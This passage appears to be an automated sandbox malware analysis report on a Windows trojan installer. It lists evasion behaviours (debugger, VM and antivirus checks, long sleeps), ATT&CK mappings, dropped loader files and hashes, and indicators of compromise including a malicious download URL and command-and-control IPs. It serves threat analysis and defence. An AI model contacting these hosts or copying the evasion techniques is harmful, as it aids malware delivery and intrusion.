            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\31-o_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\31-o_Installer.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeMemory allocated: 5130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeWindow / User API: threadDelayed 9787Jump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exe TID: 4392Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exe TID: 5336Thread sleep count: 9787 > 30Jump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exe TID: 5336Thread sleep count: 64 > 30Jump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 31-o_Installer.exe, 00000000.00000002.4545682030.00000000006B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 31-o_Installer.exe, 00000000.00000002.4545682030.00000000006B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
            Source: 31-o_Installer.exe, 00000000.00000002.4545682030.0000000000665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW fk%SystemRoot%\system32\mswsock.dll'
            Source: C:\Users\user\Desktop\31-o_Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25976
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002665D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002665D1
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002740E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_002740E4
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_02E71628 mov eax, dword ptr fs:[00000030h]0_2_02E71628
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_00277CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00277CB1
            Source: C:\Users\user\Desktop\31-o_Installer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002665D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002665D1
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0026C78D SetUnhandledExceptionFilter,0_2_0026C78D
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_0026A792 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0026A792
            Source: C:\Users\user\Desktop\31-o_Installer.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_00261671 cpuid 0_2_00261671
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_0026E04E
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: GetLocaleInfoA,0_2_00274859
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_0026F895
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0026F955
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0026F9BC
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_0026F9F8
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_0026DC2B
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_0026ECAA
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_002744BA
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0026F4CD
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00274594
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_0026F5C2
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_0026F669
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_0026F6C4
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_0026EF98
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_00265FC5
            Source: C:\Users\user\Desktop\31-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\31-o_Installer.exeCode function: 0_2_002641BA GetSystemTimeAsFileTime,__aulldiv,0_2_002641BA
            Source: C:\Users\user\Desktop\31-o_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: 31-o_Installer.exe, 00000000.00000002.4545682030.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\31-o_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.31-o_Installer.exe.5320000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 31-o_Installer.exe PID: 6672, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.31-o_Installer.exe.5320000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 31-o_Installer.exe PID: 6672, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools
            LSASS Memory141
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets34
            System Information Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Software Packing
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            31-o_Installer.exe26%ReversingLabsWin32.Trojan.Doina
            31-o_Installer.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            156.238.235.310%Avira URL Cloudsafe
            http://guanlix.cn:881/31.ccp100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            guanlix.cn
            91.208.240.157
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              156.238.235.31true
              • Avira URL Cloud: safe
              unknown
              http://guanlix.cn:881/31.ccpfalse
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name31-o_Installer.exe, 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              156.238.235.31
              unknownSeychelles
              394281XHOSTSERVERUStrue
              91.208.240.157
              guanlix.cnunknown
              139659LUCID-AS-APLUCIDACLOUDLIMITEDHKfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1466307
              Start date and time:2024-07-02 19:20:08 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 48s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:31-o_Installer.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/2@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 26
              • Number of non-executed functions: 34
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 31-o_Installer.exe
              TimeTypeDescription
              13:21:10API Interceptor8927934x Sleep call for process: 31-o_Installer.exe modified
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              XHOSTSERVERUSarm5-20240623-2204.elfGet hashmaliciousMiraiBrowse
              • 156.238.223.103
              H34bnq1S0l.elfGet hashmaliciousMiraiBrowse
              • 156.238.223.119
              armv6l.elfGet hashmaliciousMirai, GafgytBrowse
              • 156.238.223.141
              hmips-20240612-1156.elfGet hashmaliciousMiraiBrowse
              • 156.254.22.229
              skt.m68k.elfGet hashmaliciousMiraiBrowse
              • 156.238.223.104
              4JsnDtTGF3.exeGet hashmaliciousLimeRATBrowse
              • 156.238.224.215
              bPOGt24Mub.elfGet hashmaliciousMiraiBrowse
              • 156.231.2.118
              9XzxoGb2mX.elfGet hashmaliciousMiraiBrowse
              • 156.254.22.242
              2BVJRatDwx.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 156.254.22.237
              OuJmSE9GcF.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 156.254.22.204
              LUCID-AS-APLUCIDACLOUDLIMITEDHKhttps://telegram-wv.icu/Get hashmaliciousUnknownBrowse
              • 103.143.81.212
              #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
              • 45.136.13.176
              #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
              • 45.136.13.176
              CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
              • 103.143.81.180
              CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
              • 103.143.81.180
              dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
              • 45.136.14.159
              dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
              • 45.136.14.159
              qrUvlKkf7N.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.162
              qwb3x7yFdW.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.183
              sora.arm.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.155
              No context
              No context
              Process:C:\Users\user\Desktop\31-o_Installer.exe
              File Type:data
              Category:dropped
              Size (bytes):71938
              Entropy (8bit):7.605549717634749
              Encrypted:false
              SSDEEP:1536:7rOXXfr0QSEEQrLQDcbAbmYcOM6eKXBwLsy1ETqfvu+P4Rtsj5o:WfwQPEQPJbAbmYrMRKXBwLs/
              MD5:0773F13D8E171C40379FE891118B7379
              SHA1:ABBE3F022B28A7BBBA7A9AECA45E183261D5D0E5
              SHA-256:115771EA79888FA4FFD6085DEC01446CC14753BA4A89F87248FDEA468B08708E
              SHA-512:8679F7FB8AF7560084E5F44A2839AF884912F0E5A9A6B3E5F79621194879EBAA9C252F270C1107F56276E9E0ACD5E0EBEF4B4A04B5293FC5A2C1240FD470CA05
              Malicious:false
              Yara Hits:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.cod, Author: unknown
              Reputation:low
              Preview:.........z.......l.....,../z.N...xC.!....x\.G6.K..8L.S.D.*q.-.r.zd......6..".g..`.*-S }...m..V.q.%."(.uA..\.;..... .z...-~8.1....Qn...ko'.v..T....G.n..c..HW.J..H?..tE.Y..|...O.R...$8.C.V.9..q..DV.p.Y.[X.....B..u.z..)....~;.....D0..R.....@..Dt..(Q..2,.{G&......8LKy..hp...".Fn\..x.`..........b...6*.=y.B..........................................................................................................................................................................................................................................................]..........t.<.b...........fc.Gl.K./..a.;..{....q....0.*.RC.K\.......8e.......1.[...&../$._.6.....Y9M.s.c5.5...G.{.#.'&.O...8e.@)m.e.......J.....a...3....k.....Q\KAx.Vp7S.T.$f.4....w.zde8.....[C....OI2+..3].M....O.E.u ...4....M.......Im_..'F..{:^..N*.A..gCG.-.;.f....R....o...,v:-.D..d.....ad.....e.N{5(4.[.TXE..-...E?.K.V......T..O.F.v.9.i&O .p...M.l..2l....Jdi5..^J.._Y....O...\A.C..SBX.S.n..J..i...+'..|
              Process:C:\Users\user\Desktop\31-o_Installer.exe
              File Type:data
              Category:dropped
              Size (bytes):71938
              Entropy (8bit):7.605549717634749
              Encrypted:false
              SSDEEP:1536:7rOXXfr0QSEEQrLQDcbAbmYcOM6eKXBwLsy1ETqfvu+P4Rtsj5o:WfwQPEQPJbAbmYrMRKXBwLs/
              MD5:0773F13D8E171C40379FE891118B7379
              SHA1:ABBE3F022B28A7BBBA7A9AECA45E183261D5D0E5
              SHA-256:115771EA79888FA4FFD6085DEC01446CC14753BA4A89F87248FDEA468B08708E
              SHA-512:8679F7FB8AF7560084E5F44A2839AF884912F0E5A9A6B3E5F79621194879EBAA9C252F270C1107F56276E9E0ACD5E0EBEF4B4A04B5293FC5A2C1240FD470CA05
              Malicious:false
              Yara Hits:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp, Author: unknown
              Reputation:low
              Preview:.........z.......l.....,../z.N...xC.!....x\.G6.K..8L.S.D.*q.-.r.zd......6..".g..`.*-S }...m..V.q.%."(.uA..\.;..... .z...-~8.1....Qn...ko'.v..T....G.n..c..HW.J..H?..tE.Y..|...O.R...$8.C.V.9..q..DV.p.Y.[X.....B..u.z..)....~;.....D0..R.....@..Dt..(Q..2,.{G&......8LKy..hp...".Fn\..x.`..........b...6*.=y.B..........................................................................................................................................................................................................................................................]..........t.<.b...........fc.Gl.K./..a.;..{....q....0.*.RC.K\.......8e.......1.[...&../$._.6.....Y9M.s.c5.5...G.{.#.'&.O...8e.@)m.e.......J.....a...3....k.....Q\KAx.Vp7S.T.$f.4....w.zde8.....[C....OI2+..3].M....O.E.u ...4....M.......Im_..'F..{:^..N*.A..gCG.-.;.f....R....o...,v:-.D..d.....ad.....e.N{5(4.[.TXE..-...E?.K.V......T..O.F.v.9.i&O .p...M.l..2l....Jdi5..^J.._Y....O...\A.C..SBX.S.n..J..i...+'..|
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):5.939901542426743
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:31-o_Installer.exe
              File size:249'344 bytes
              MD5:5913d1b0d2fa0204e9e063467d000c3a
              SHA1:50b4b4929edb21c17c49c40ac2a4050bd8f93768
              SHA256:3192aea6cf0c450948b2006ca0ef28dcaf06aa4c9730ef8dc8199975064cdf72
              SHA512:73a64c4bb61105b8363d6848c9132e2cf0a7ab131417b1190577c256a2d97277fbde0e2d2bb6990cb3e8dac786da7bb7928093cb2b465be9120495dbf0d4e2a8
              SSDEEP:3072:ouWmO3uTwghfpRBCa5XrD5sxTQ1mb7QNaV4ZQeAnuTCt2xbzmyoaq6rcYsc8kOee:ouW4TwSR57aTQkQN4njZ2x0p
              TLSH:39346B92F6C0C4B6D81711B5D83ADEB2126BBD798974010B36A5372F5EB72831937E0B
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L......f.................v...T.....
              Icon Hash:20246c0c56e20926
              Entrypoint:0x405b41
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x66820694 [Mon Jul 1 01:29:56 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:0b47c746b58dc722dcec07246158fda2
              Instruction
              call 00007F3B50DF3715h
              jmp 00007F3B50DEC17Eh
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              test eax, eax
              je 00007F3B50DEC304h
              sub eax, 08h
              cmp dword ptr [eax], 0000DDDDh
              jne 00007F3B50DEC2F9h
              push eax
              call 00007F3B50DEABDFh
              pop ecx
              pop ebp
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              push esi
              mov esi, ecx
              mov byte ptr [esi+0Ch], 00000000h
              test eax, eax
              jne 00007F3B50DEC355h
              call 00007F3B50DEFF0Eh
              mov dword ptr [esi+08h], eax
              mov ecx, dword ptr [eax+6Ch]
              mov dword ptr [esi], ecx
              mov ecx, dword ptr [eax+68h]
              mov dword ptr [esi+04h], ecx
              mov ecx, dword ptr [esi]
              cmp ecx, dword ptr [004201F8h]
              je 00007F3B50DEC304h
              mov ecx, dword ptr [0041FFB0h]
              test dword ptr [eax+70h], ecx
              jne 00007F3B50DEC2F9h
              call 00007F3B50DF40EFh
              mov dword ptr [esi], eax
              mov eax, dword ptr [esi+04h]
              cmp eax, dword ptr [0041FEB8h]
              je 00007F3B50DEC308h
              mov eax, dword ptr [esi+08h]
              mov ecx, dword ptr [0041FFB0h]
              test dword ptr [eax+70h], ecx
              jne 00007F3B50DEC2FAh
              call 00007F3B50DF394Eh
              mov dword ptr [esi+04h], eax
              mov eax, dword ptr [esi+08h]
              test byte ptr [eax+70h], 00000002h
              jne 00007F3B50DEC306h
              or dword ptr [eax+70h], 02h
              mov byte ptr [esi+0Ch], 00000001h
              jmp 00007F3B50DEC2FCh
              mov ecx, dword ptr [eax]
              mov dword ptr [esi], ecx
              mov eax, dword ptr [eax+04h]
              mov dword ptr [esi+04h], eax
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              mov edi, edi
              push ebp
              mov ebp, esp
              sub esp, 10h
              mov eax, dword ptr [0041F920h]
              xor eax, ebp
              mov dword ptr [ebp-04h], eax
              mov edx, dword ptr [ebp+18h]
              push ebx
              Programming Language:
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2010 build 30319
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x1d96c0x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000x1c6ec.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x138c.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c3780x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x190000x150.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
